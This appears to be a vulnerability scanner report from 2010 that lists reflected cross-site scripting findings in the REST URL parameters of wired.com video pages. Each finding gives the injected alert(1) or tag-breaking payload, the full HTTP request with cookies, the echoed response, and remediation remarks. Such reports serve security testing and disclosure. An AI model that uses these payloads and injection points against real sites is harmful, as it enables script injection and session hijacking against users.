GET /video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/61636972400183c18"-alert(1)-"5548a503785 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=298 Expires: Mon, 22 Nov 2010 00:55:27 GMT Date: Mon, 22 Nov 2010 00:50:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106785
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload e91c4--><script>alert(1)</script>46de8dac3cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videoe91c4--><script>alert(1)</script>46de8dac3cf/latest-videos/featured/1716500189/into-the-unknown/672347081001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29452 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:52:21 GMT Date: Mon, 22 Nov 2010 00:47:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videoe91c4--><script>alert(1)</script>46de8dac3cf/latest-videos/featured/1716500189/into-the-unknown/672347081001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae61a"><a>83daec0e404 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videoae61a"><a>83daec0e404/latest-videos/featured/1716500189/into-the-unknown/672347081001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29415 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:51:31 GMT Date: Mon, 22 Nov 2010 00:46:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videoae61a"><a>83daec0e404 ss_latest-videos c_featured"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d629"-alert(1)-"11ecc1b8d6d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos8d629"-alert(1)-"11ecc1b8d6d/featured/1716500189/into-the-unknown/672347081001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:53:27 GMT Date: Mon, 22 Nov 2010 00:48:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106768
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cf44"><a>5ff97d9d752 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos4cf44"><a>5ff97d9d752/featured/1716500189/into-the-unknown/672347081001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:52:25 GMT Date: Mon, 22 Nov 2010 00:47:25 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106754
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos4cf44"><a>5ff97d9d752 c_featured"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5296d"-alert(1)-"e92a5e84c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/featured5296d"-alert(1)-"e92a5e84c9/1716500189/into-the-unknown/672347081001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=279 Expires: Mon, 22 Nov 2010 00:54:14 GMT Date: Mon, 22 Nov 2010 00:49:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106773
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1337f"><a>2a9641c5dbf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/featured1337f"><a>2a9641c5dbf/1716500189/into-the-unknown/672347081001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:53:43 GMT Date: Mon, 22 Nov 2010 00:48:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106690
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_featured1337f"><a>2a9641c5dbf"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f37b"-alert(1)-"7139282558d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/featured/17165001897f37b"-alert(1)-"7139282558d/into-the-unknown/672347081001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:54:53 GMT Date: Mon, 22 Nov 2010 00:49:53 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106747
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdf70"-alert(1)-"798f3ba9e4a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/featured/1716500189/into-the-unknowncdf70"-alert(1)-"798f3ba9e4a/672347081001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:55:00 GMT Date: Mon, 22 Nov 2010 00:50:00 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106747
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86432"-alert(1)-"fb2fe4ecb38 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/featured/1716500189/into-the-unknown/67234708100186432"-alert(1)-"fb2fe4ecb38 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:55:14 GMT Date: Mon, 22 Nov 2010 00:50:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106740
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4efd7"><a>8d6e56f6bcf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video4efd7"><a>8d6e56f6bcf/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29429 Vary: Accept-Encoding Cache-Control: max-age=296 Expires: Mon, 22 Nov 2010 00:49:45 GMT Date: Mon, 22 Nov 2010 00:44:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video4efd7"><a>8d6e56f6bcf ss_latest-videos c_highlights"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload f2def--><script>alert(1)</script>89c0318b3b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videof2def--><script>alert(1)</script>89c0318b3b3/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29464 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:50:38 GMT Date: Mon, 22 Nov 2010 00:45:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videof2def--><script>alert(1)</script>89c0318b3b3/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a817"-alert(1)-"9fa2c73f7d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos4a817"-alert(1)-"9fa2c73f7d7/highlights/1716440574/battle-los-angeles-trailer/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:51:33 GMT Date: Mon, 22 Nov 2010 00:46:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106779
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f243"><a>9ea1ab9c052 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos6f243"><a>9ea1ab9c052/highlights/1716440574/battle-los-angeles-trailer/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:50:40 GMT Date: Mon, 22 Nov 2010 00:45:40 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106750
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos6f243"><a>9ea1ab9c052 c_highlights"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d2a5"-alert(1)-"4c88b33dbf4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights5d2a5"-alert(1)-"4c88b33dbf4/1716440574/battle-los-angeles-trailer/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:52:43 GMT Date: Mon, 22 Nov 2010 00:47:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106782
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca37f"><a>75458ce8857 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/highlightsca37f"><a>75458ce8857/1716440574/battle-los-angeles-trailer/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=291 Expires: Mon, 22 Nov 2010 00:51:26 GMT Date: Mon, 22 Nov 2010 00:46:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106795
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_highlightsca37f"><a>75458ce8857"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5be1e"-alert(1)-"aa092f4bf91 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/17164405745be1e"-alert(1)-"aa092f4bf91/battle-los-angeles-trailer/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:52:57 GMT Date: Mon, 22 Nov 2010 00:47:57 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106781
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33a75"-alert(1)-"b39049b1da7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
